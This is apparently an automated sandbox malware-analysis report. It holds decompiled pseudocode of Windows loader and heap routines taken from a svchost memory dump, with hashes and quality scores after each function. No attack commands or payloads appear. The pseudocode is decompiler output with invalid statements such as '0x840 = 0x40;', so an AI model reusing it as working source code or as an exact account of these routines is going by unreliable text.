                                          								goto L50;
                                          							}
                                          							_t146 =  *0x3b17b9c; // 0x0
                                          							_t235 = L03A44620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                          							 *(_t237 - 0x60) = _t235;
                                          							__eflags = _t235;
                                          							if(_t235 == 0) {
                                          								_t149 = 0xc0000017;
                                          								 *(_t237 - 0x44) = 0xc0000017;
                                          							} else {
                                          								_t149 =  *(_t237 - 0x44);
                                          							}
                                          							__eflags = _t149;
                                          							if(__eflags >= 0) {
                                          								L8:
                                          								 *(_t237 - 0x64) = _t235;
                                          								_t150 =  *0x3b17b10; // 0x0
                                          								 *(_t237 - 0x4c) = _t150;
                                          								_push(_t237 - 0x74);
                                          								_push(_t237 - 0x39);
                                          								_push(_t237 - 0x58);
                                          								_t193 = E03A5A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                          								 *(_t237 - 0x44) = _t193;
                                          								__eflags = _t193;
                                          								if(_t193 < 0) {
                                          									L30:
                                          									E03A3FFB0(_t193, _t235, 0x3b18550);
                                          									__eflags = _t235 - _t237 - 0x38;
                                          									if(_t235 != _t237 - 0x38) {
                                          										_t235 =  *(_t237 - 0x48);
                                          										L03A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                          									} else {
                                          										_t235 =  *(_t237 - 0x48);
                                          									}
                                          									__eflags =  *(_t237 - 0x6c);
                                          									if( *(_t237 - 0x6c) != 0) {
                                          										L03A477F0(_t235, _t236,  *(_t237 - 0x6c));
                                          									}
                                          									__eflags = _t193;
                                          									if(_t193 >= 0) {
                                          										goto L4;
                                          									} else {
                                          										goto L5;
                                          									}
                                          								}
                                          								_t204 =  *0x3b17b04; // 0x1
                                          								 *(_t235 + 8) = _t204;
                                          								__eflags =  *((char*)(_t237 - 0x39));
                                          								if( *((char*)(_t237 - 0x39)) != 0) {
                                          									 *(_t235 + 4) = 1;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                          									_t161 =  *0x3b17b10; // 0x0
                                          									 *(_t237 - 0x4c) = _t161;
                                          								} else {
                                          									 *(_t235 + 4) = _t236;
                                          									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                          								}
                                          								 *((intOrPtr*)(_t237 - 0x54)) = E03A637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                          								_t224 = _t236;
                                          								 *(_t237 - 0x40) = _t236;
                                          								 *(_t237 - 0x50) = _t236;
                                          								while(1) {
                                          									_t163 =  *(_t235 + 8);
                                          									__eflags = _t224 - _t163;
                                          									if(_t224 >= _t163) {
                                          										break;
                                          									}
                                          									_t228 =  *0x3b17b9c; // 0x0
                                          									_t214 = L03A44620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                          									 *(_t237 - 0x78) = _t214;
                                          									__eflags = _t214;
                                          									if(_t214 == 0) {
                                          										L52:
                                          										_t193 = 0xc0000017;
                                          										L19:
                                          										 *(_t237 - 0x44) = _t193;
                                          										L20:
                                          										_t206 =  *(_t237 - 0x40);
                                          										__eflags = _t206;
                                          										if(_t206 == 0) {
                                          											L26:
                                          											__eflags = _t193;
                                          											if(_t193 < 0) {
                                          												E03A637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) != 0) {
                                          													 *0x3b17b10 =  *0x3b17b10 - 8;
                                          												}
                                          											} else {
                                          												_t169 =  *(_t237 - 0x68);
                                          												__eflags = _t169;
                                          												if(_t169 != 0) {
                                          													 *0x3b17b04 =  *0x3b17b04 - _t169;
                                          												}
                                          											}
                                          											__eflags = _t193;
                                          											if(_t193 >= 0) {
                                          												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                          											}
                                          											goto L30;
                                          										}
                                          										_t226 = _t206 * 0xc;
                                          										__eflags = _t226;
                                          										_t194 =  *(_t237 - 0x48);
                                          										do {
                                          											 *(_t237 - 0x40) = _t206 - 1;
                                          											_t226 = _t226 - 0xc;
                                          											 *(_t237 - 0x4c) = _t226;
                                          											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                          											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                          												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                          												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                          													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                          													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          													__eflags =  *((char*)(_t237 - 0x39));
                                          													if( *((char*)(_t237 - 0x39)) == 0) {
                                          														_t171 = _t210;
                                          													} else {
                                          														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                          														L03A477F0(_t194, _t236, _t210 - 8);
                                          														_t171 =  *(_t237 - 0x50);
                                          													}
                                          													L48:
                                          													L03A477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                          													L46:
                                          													_t206 =  *(_t237 - 0x40);
                                          													_t226 =  *(_t237 - 0x4c);
                                          													goto L24;
                                          												}
                                          												 *0x3b17b08 =  *0x3b17b08 + 1;
                                          												goto L24;
                                          											}
                                          											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                          											__eflags = _t171;
                                          											if(_t171 != 0) {
                                          												__eflags =  *((char*)(_t237 - 0x39));
                                          												if( *((char*)(_t237 - 0x39)) == 0) {
                                          													goto L48;
                                          												}
                                          												E03A657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                          												goto L46;
                                          											}
                                          											L24:
                                          											__eflags = _t206;
                                          										} while (_t206 != 0);
                                          										_t193 =  *(_t237 - 0x44);
                                          										goto L26;
                                          									}
                                          									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                          									 *(_t237 - 0x7c) = _t232;
                                          									 *(_t232 - 4) = _t214;
                                          									 *(_t237 - 4) = _t236;
                                          									E03A6F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                          									_t238 = _t238 + 0xc;
                                          									 *(_t237 - 4) = 0xfffffffe;
                                          									_t215 =  *(_t237 - 0x48);
                                          									__eflags = _t193;
                                          									if(_t193 < 0) {
                                          										L03A477F0(_t215, _t236,  *(_t237 - 0x78));
                                          										goto L20;
                                          									}
                                          									__eflags =  *((char*)(_t237 - 0x39));
                                          									if( *((char*)(_t237 - 0x39)) != 0) {
                                          										_t233 = E03A5A44B( *(_t237 - 0x4c));
                                          										 *(_t237 - 0x50) = _t233;
                                          										__eflags = _t233;
                                          										if(_t233 == 0) {
                                          											L03A477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                          											goto L52;
                                          										}
                                          										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                          										L17:
                                          										_t234 =  *(_t237 - 0x40);
                                          										_t218 = _t234 * 0xc;
                                          										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                          										 *(_t218 + _t235 + 0x10) = _t236;
                                          										_t224 = _t234 + 1;
                                          										 *(_t237 - 0x40) = _t224;
                                          										 *(_t237 - 0x50) = _t224;
                                          										_t193 =  *(_t237 - 0x44);
                                          										continue;
                                          									}
                                          									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                          									goto L17;
                                          								}
                                          								 *_t235 = _t236;
                                          								_t165 = 0x10 + _t163 * 0xc;
                                          								__eflags = _t165;
                                          								_push(_t165);
                                          								_push(_t235);
                                          								_push(0x23);
                                          								_push(0xffffffff);
                                          								_t193 = E03A696C0();
                                          								goto L19;
                                          							} else {
                                          								goto L50;
                                          							}
                                          						}
                                          						_t235 = _t237 - 0x38;
                                          						 *(_t237 - 0x60) = _t235;
                                          						goto L8;
                                          					}
                                          					goto L4;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63d063aca35b3f88b4bf5c47baa58827ef9f25cdc27df017505a5362e539e8da
                                          • Instruction ID: fe6d7c85e2cc412c714626255e32a1c40ffb5b2e0844adee117fcfb2af6b050d
                                          • Opcode Fuzzy Hash: 63d063aca35b3f88b4bf5c47baa58827ef9f25cdc27df017505a5362e539e8da
                                          • Instruction Fuzzy Hash: B1B14874E00309DFCB14DFA8CA84AAEBBB9BF4A304F14412EF415AB755DB78A945CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E03A5513A(intOrPtr __ecx, void* __edx) {
                                          				signed int _v8;
                                          				signed char _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				char _v63;
                                          				char _v64;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed char* _v92;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t157;
                                          				signed int _t159;
                                          				signed int _t160;
                                          				unsigned int* _t161;
                                          				intOrPtr _t165;
                                          				signed int _t172;
                                          				signed char* _t181;
                                          				intOrPtr _t189;
                                          				intOrPtr* _t200;
                                          				signed int _t202;
                                          				signed int _t203;
                                          				char _t204;
                                          				signed int _t207;
                                          				signed int _t208;
                                          				void* _t209;
                                          				intOrPtr _t210;
                                          				signed int _t212;
                                          				signed int _t214;
                                          				signed int _t221;
                                          				signed int _t222;
                                          				signed int _t226;
                                          				intOrPtr* _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				intOrPtr _t237;
                                          				intOrPtr _t238;
                                          				intOrPtr _t240;
                                          				void* _t245;
                                          				signed int _t246;
                                          				signed int _t247;
                                          				void* _t248;
                                          				void* _t251;
                                          				void* _t252;
                                          				signed int _t253;
                                          				signed int _t255;
                                          				signed int _t256;
                                          
                                          				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0x3b1d360 ^ _t255;
                                          				_v32 = _v32 & 0x00000000;
                                          				_t251 = __edx;
                                          				_t237 = __ecx;
                                          				_t212 = 6;
                                          				_t245 =  &_v84;
                                          				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                          				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                          				_v48 = __ecx;
                                          				_v36 = _t207;
                                          				_t157 = memset(_t245, 0, _t212 << 2);
                                          				_t256 = _t255 + 0xc;
                                          				_t246 = _t245 + _t212;
                                          				if(_t207 == 2) {
                                          					_t247 =  *(_t237 + 0x60);
                                          					_t208 =  *(_t237 + 0x64);
                                          					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                          					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                          					_v104 = _t159;
                                          					_v76 = _t159;
                                          					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                          					_v100 = _t160;
                                          					_v72 = _t160;
                                          					L19:
                                          					_v80 = _t208;
                                          					_v84 = _t247;
                                          					L8:
                                          					_t214 = 0;
                                          					if( *(_t237 + 0x74) > 0) {
                                          						_t82 = _t237 + 0x84; // 0x124
                                          						_t161 = _t82;
                                          						_v92 = _t161;
                                          						while( *_t161 >> 0x1f != 0) {
                                          							_t200 = _v92;
                                          							if( *_t200 == 0x80000000) {
                                          								break;
                                          							}
                                          							_t214 = _t214 + 1;
                                          							_t161 = _t200 + 0x10;
                                          							_v92 = _t161;
                                          							if(_t214 <  *(_t237 + 0x74)) {
                                          								continue;
                                          							}
                                          							goto L9;
                                          						}
                                          						_v88 = _t214 << 4;
                                          						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                          						_t165 = 0;
                                          						asm("adc eax, [ecx+edx+0x7c]");
                                          						_v24 = _t165;
                                          						_v28 = _v40;
                                          						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                          						_t221 = _v40;
                                          						_v16 =  *_v92;
                                          						_v32 =  &_v28;
                                          						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                          							goto L9;
                                          						}
                                          						_t240 = _v48;
                                          						if( *_v92 != 0x80000000) {
                                          							goto L9;
                                          						}
                                          						 *((intOrPtr*)(_t221 + 8)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                          						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                          						_t226 = 0;
                                          						_t181 = _t251 + 0x66;
                                          						_v88 = 0;
                                          						_v92 = _t181;
                                          						do {
                                          							if( *((char*)(_t181 - 2)) == 0) {
                                          								goto L31;
                                          							}
                                          							_t226 = _v88;
                                          							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                          								_t181 = E03A6D0F0(1, _t226 + 0x20, 0);
                                          								_t226 = _v40;
                                          								 *(_t226 + 8) = _t181;
                                          								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                          								L34:
                                          								if(_v44 == 0) {
                                          									goto L9;
                                          								}
                                          								_t210 = _v44;
                                          								_t127 = _t210 + 0x1c; // 0x1c
                                          								_t249 = _t127;
                                          								E03A42280(_t181, _t127);
                                          								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                          								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                          								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                          								}
                                          								_t189 = L03A44620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                          								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                          								if(_t189 != 0) {
                                          									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                          									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                          									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                          									 *_t232 = _t232 + 0x10;
                                          									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                          									E03A6F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                          									_t256 = _t256 + 0xc;
                                          								}
                                          								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                          								E03A3FFB0(_t210, _t249, _t249);
                                          								_t222 = _v76;
                                          								_t172 = _v80;
                                          								_t208 = _v84;
                                          								_t247 = _v88;
                                          								L10:
                                          								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                          								_v44 = _t238;
                                          								if(_t238 != 0) {
                                          									 *0x3b1b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                          									_v44();
                                          								}
                                          								_pop(_t248);
                                          								_pop(_t252);
                                          								_pop(_t209);
                                          								return E03A6B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                          							}
                                          							_t181 = _v92;
                                          							L31:
                                          							_t226 = _t226 + 1;
                                          							_t181 =  &(_t181[0x18]);
                                          							_v88 = _t226;
                                          							_v92 = _t181;
                                          						} while (_t226 < 4);
                                          						goto L34;
                                          					}
                                          					L9:
                                          					_t172 = _v104;
                                          					_t222 = _v100;
                                          					goto L10;
                                          				}
                                          				_t247 = _t246 | 0xffffffff;
                                          				_t208 = _t247;
                                          				_v84 = _t247;
                                          				_v80 = _t208;
                                          				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                          					_t233 = _v72;
                                          					_v105 = _v64;
                                          					_t202 = _v76;
                                          				} else {
                                          					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                          					_v105 = 1;
                                          					if(_v63 <= _t204) {
                                          						_v63 = _t204;
                                          					}
                                          					_t202 = _v76 |  *(_t251 + 0x40);
                                          					_t233 = _v72 |  *(_t251 + 0x44);
                                          					_t247 =  *(_t251 + 0x38);
                                          					_t208 =  *(_t251 + 0x3c);
                                          					_v76 = _t202;
                                          					_v72 = _t233;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				_v104 = _t202;
                                          				_v100 = _t233;
                                          				if( *((char*)(_t251 + 0xc4)) != 0) {
                                          					_t237 = _v48;
                                          					_v105 = 1;
                                          					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                          						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                          						_t237 = _v48;
                                          					}
                                          					_t203 = _t202 |  *(_t251 + 0xb8);
                                          					_t234 = _t233 |  *(_t251 + 0xbc);
                                          					_t247 = _t247 &  *(_t251 + 0xb0);
                                          					_t208 = _t208 &  *(_t251 + 0xb4);
                                          					_v104 = _t203;
                                          					_v76 = _t203;
                                          					_v100 = _t234;
                                          					_v72 = _t234;
                                          					_v84 = _t247;
                                          					_v80 = _t208;
                                          				}
                                          				if(_v105 == 0) {
                                          					_v36 = _v36 & 0x00000000;
                                          					_t208 = 0;
                                          					_t247 = 0;
                                          					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                          					goto L19;
                                          				} else {
                                          					_v36 = 1;
                                          					goto L8;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bef2414e9a4175267594f4a4a4eb2fb016b41b56defda04ab32708fcb6a9c59c
                                          • Instruction ID: 1a0a51c0dc6ee6d49ca8b1c296c69dd7423cd02a61dee7fa60e53d5862dc41d9
                                          • Opcode Fuzzy Hash: bef2414e9a4175267594f4a4a4eb2fb016b41b56defda04ab32708fcb6a9c59c
                                          • Instruction Fuzzy Hash: 1CC133755083808FD754CF28C580A5AFBF1BF89314F188A6EF89A9B362D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E03A503E2(signed int __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t56;
                                          				signed int _t58;
                                          				char* _t64;
                                          				intOrPtr _t65;
                                          				signed int _t74;
                                          				signed int _t79;
                                          				char* _t83;
                                          				intOrPtr _t84;
                                          				signed int _t93;
                                          				signed int _t94;
                                          				signed char* _t95;
                                          				signed int _t99;
                                          				signed int _t100;
                                          				signed char* _t101;
                                          				signed int _t105;
                                          				signed int _t119;
                                          				signed int _t120;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int _t127;
                                          
                                          				_v8 =  *0x3b1d360 ^ _t127;
                                          				_t119 = __ecx;
                                          				_t105 = __edx;
                                          				_t118 = 0;
                                          				_v20 = __edx;
                                          				_t120 =  *(__ecx + 0x20);
                                          				if(E03A50548(__ecx, 0) != 0) {
                                          					_t56 = 0xc000022d;
                                          					L23:
                                          					return E03A6B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                          				} else {
                                          					_v12 = _v12 | 0xffffffff;
                                          					_t58 = _t120 + 0x24;
                                          					_t109 =  *(_t120 + 0x18);
                                          					_t118 = _t58;
                                          					_v16 = _t58;
                                          					E03A3B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                          					_v52 = 0x18;
                                          					_v48 = 0;
                                          					0x840 = 0x40;
                                          					if( *0x3b17c1c != 0) {
                                          					}
                                          					_v40 = 0x840;
                                          					_v44 = _t105;
                                          					_v36 = 0;
                                          					_v32 = 0;
                                          					if(E03A47D50() != 0) {
                                          						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t64 = 0x7ffe0384;
                                          					}
                                          					if( *_t64 != 0) {
                                          						_t65 =  *[fs:0x30];
                                          						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                          						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                          							_t100 = E03A47D50();
                                          							__eflags = _t100;
                                          							if(_t100 == 0) {
                                          								_t101 = 0x7ffe0385;
                                          							} else {
                                          								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t101 & 0x00000020;
                                          							if(( *_t101 & 0x00000020) != 0) {
                                          								_t118 = _t118 | 0xffffffff;
                                          								_t109 = 0x1485;
                                          								E03AA7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					_t105 = 0;
                                          					while(1) {
                                          						_push(0x60);
                                          						_push(5);
                                          						_push( &_v64);
                                          						_push( &_v52);
                                          						_push(0x100021);
                                          						_push( &_v12);
                                          						_t122 = E03A69830();
                                          						if(_t122 >= 0) {
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc0000034;
                                          						if(_t122 == 0xc0000034) {
                                          							L38:
                                          							_t120 = 0xc0000135;
                                          							break;
                                          						}
                                          						__eflags = _t122 - 0xc000003a;
                                          						if(_t122 == 0xc000003a) {
                                          							goto L38;
                                          						}
                                          						__eflags = _t122 - 0xc0000022;
                                          						if(_t122 != 0xc0000022) {
                                          							break;
                                          						}
                                          						__eflags = _t105;
                                          						if(__eflags != 0) {
                                          							break;
                                          						}
                                          						_t109 = _t119;
                                          						_t99 = E03AA69A6(_t119, __eflags);
                                          						__eflags = _t99;
                                          						if(_t99 == 0) {
                                          							break;
                                          						}
                                          						_t105 = _t105 + 1;
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L22:
                                          						_t56 = _t120;
                                          						goto L23;
                                          					}
                                          					if( *0x3b17c04 != 0) {
                                          						_t118 = _v12;
                                          						_t120 = E03AAA7AC(_t119, _t118, _t109);
                                          						__eflags = _t120;
                                          						if(_t120 >= 0) {
                                          							goto L10;
                                          						}
                                          						__eflags =  *0x3b17bd8;
                                          						if( *0x3b17bd8 != 0) {
                                          							L20:
                                          							if(_v12 != 0xffffffff) {
                                          								_push(_v12);
                                          								E03A695D0();
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					L10:
                                          					_push(_v12);
                                          					_t105 = _t119 + 0xc;
                                          					_push(0x1000000);
                                          					_push(0x10);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xf);
                                          					_push(_t105);
                                          					_t120 = E03A699A0();
                                          					if(_t120 < 0) {
                                          						__eflags = _t120 - 0xc000047e;
                                          						if(_t120 == 0xc000047e) {
                                          							L51:
                                          							_t74 = E03AA3540(_t120);
                                          							_t119 = _v16;
                                          							_t120 = _t74;
                                          							L52:
                                          							_t118 = 0x1485;
                                          							E03A2B1E1(_t120, 0x1485, 0, _t119);
                                          							goto L20;
                                          						}
                                          						__eflags = _t120 - 0xc000047f;
                                          						if(_t120 == 0xc000047f) {
                                          							goto L51;
                                          						}
                                          						__eflags = _t120 - 0xc0000462;
                                          						if(_t120 == 0xc0000462) {
                                          							goto L51;
                                          						}
                                          						_t119 = _v16;
                                          						__eflags = _t120 - 0xc0000017;
                                          						if(_t120 != 0xc0000017) {
                                          							__eflags = _t120 - 0xc000009a;
                                          							if(_t120 != 0xc000009a) {
                                          								__eflags = _t120 - 0xc000012d;
                                          								if(_t120 != 0xc000012d) {
                                          									_v28 = _t119;
                                          									_push( &_v56);
                                          									_push(1);
                                          									_v24 = _t120;
                                          									_push( &_v28);
                                          									_push(1);
                                          									_push(2);
                                          									_push(0xc000007b);
                                          									_t79 = E03A6AAF0();
                                          									__eflags = _t79;
                                          									if(_t79 >= 0) {
                                          										__eflags =  *0x3b18474 - 3;
                                          										if( *0x3b18474 != 3) {
                                          											 *0x3b179dc =  *0x3b179dc + 1;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L52;
                                          					}
                                          					if(E03A47D50() != 0) {
                                          						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					} else {
                                          						_t83 = 0x7ffe0384;
                                          					}
                                          					if( *_t83 != 0) {
                                          						_t84 =  *[fs:0x30];
                                          						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                          						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                          							_t94 = E03A47D50();
                                          							__eflags = _t94;
                                          							if(_t94 == 0) {
                                          								_t95 = 0x7ffe0385;
                                          							} else {
                                          								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          							}
                                          							__eflags =  *_t95 & 0x00000020;
                                          							if(( *_t95 & 0x00000020) != 0) {
                                          								E03AA7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                          							}
                                          						}
                                          					}
                                          					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                          						if( *0x3b18708 != 0) {
                                          							_t118 =  *0x7ffe0330;
                                          							_t123 =  *0x3b17b00; // 0x0
                                          							asm("ror esi, cl");
                                          							 *0x3b1b1e0(_v12, _v20, 0x20);
                                          							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                          							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                          							asm("sbb esi, esi");
                                          							_t120 =  ~_t50 & _t93;
                                          						} else {
                                          							_t120 = 0;
                                          						}
                                          					}
                                          					if( !_t120 >= 0) {
                                          						L19:
                                          						_push( *_t105);
                                          						E03A695D0();
                                          						 *_t105 =  *_t105 & 0x00000000;
                                          						goto L20;
                                          					}
                                          					_t120 = E03A37F65(_t119);
                                          					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                          						__eflags = _t120;
                                          						if(_t120 < 0) {
                                          							goto L19;
                                          						}
                                          						 *(_t119 + 0x64) = _v12;
                                          						goto L22;
                                          					}
                                          					goto L19;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f4093fa3882c4258ff7846505354b1394e6af8912ea565221c4ad8c8f2ab487
                                          • Instruction ID: 6a7057dfd3e8e25b99a6b88f9e9df9b3e814c445fcaaf755508720f4caafc8d9
                                          • Opcode Fuzzy Hash: 7f4093fa3882c4258ff7846505354b1394e6af8912ea565221c4ad8c8f2ab487
                                          • Instruction Fuzzy Hash: 6F910275A00614AFEF21DB69C944BAEBBF4AB05724F09026BFD11AB2D0DB749D01C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E03A2C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                          				signed int _v8;
                                          				char _v1036;
                                          				signed int _v1040;
                                          				char _v1048;
                                          				signed int _v1052;
                                          				signed char _v1056;
                                          				void* _v1058;
                                          				char _v1060;
                                          				signed int _v1064;
                                          				void* _v1068;
                                          				intOrPtr _v1072;
                                          				void* _v1084;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t70;
                                          				intOrPtr _t72;
                                          				signed int _t74;
                                          				intOrPtr _t77;
                                          				signed int _t78;
                                          				signed int _t81;
                                          				void* _t101;
                                          				signed int _t102;
                                          				signed int _t107;
                                          				signed int _t109;
                                          				signed int _t110;
                                          				signed char _t111;
                                          				signed int _t112;
                                          				signed int _t113;
                                          				signed int _t114;
                                          				intOrPtr _t116;
                                          				void* _t117;
                                          				char _t118;
                                          				void* _t120;
                                          				char _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t125;
                                          
                                          				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                          				_v8 =  *0x3b1d360 ^ _t125;
                                          				_t116 = _a4;
                                          				_v1056 = _a16;
                                          				_v1040 = _a24;
                                          				if(E03A36D30( &_v1048, _a8) < 0) {
                                          					L4:
                                          					_pop(_t117);
                                          					_pop(_t120);
                                          					_pop(_t101);
                                          					return E03A6B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                          				}
                                          				_t70 = _a20;
                                          				if(_t70 >= 0x3f4) {
                                          					_t121 = _t70 + 0xc;
                                          					L19:
                                          					_t107 =  *( *[fs:0x30] + 0x18);
                                          					__eflags = _t107;
                                          					if(_t107 == 0) {
                                          						L60:
                                          						_t68 = 0xc0000017;
                                          						goto L4;
                                          					}
                                          					_t72 =  *0x3b17b9c; // 0x0
                                          					_t74 = L03A44620(_t107, _t107, _t72 + 0x180000, _t121);
                                          					_v1064 = _t74;
                                          					__eflags = _t74;
                                          					if(_t74 == 0) {
                                          						goto L60;
                                          					}
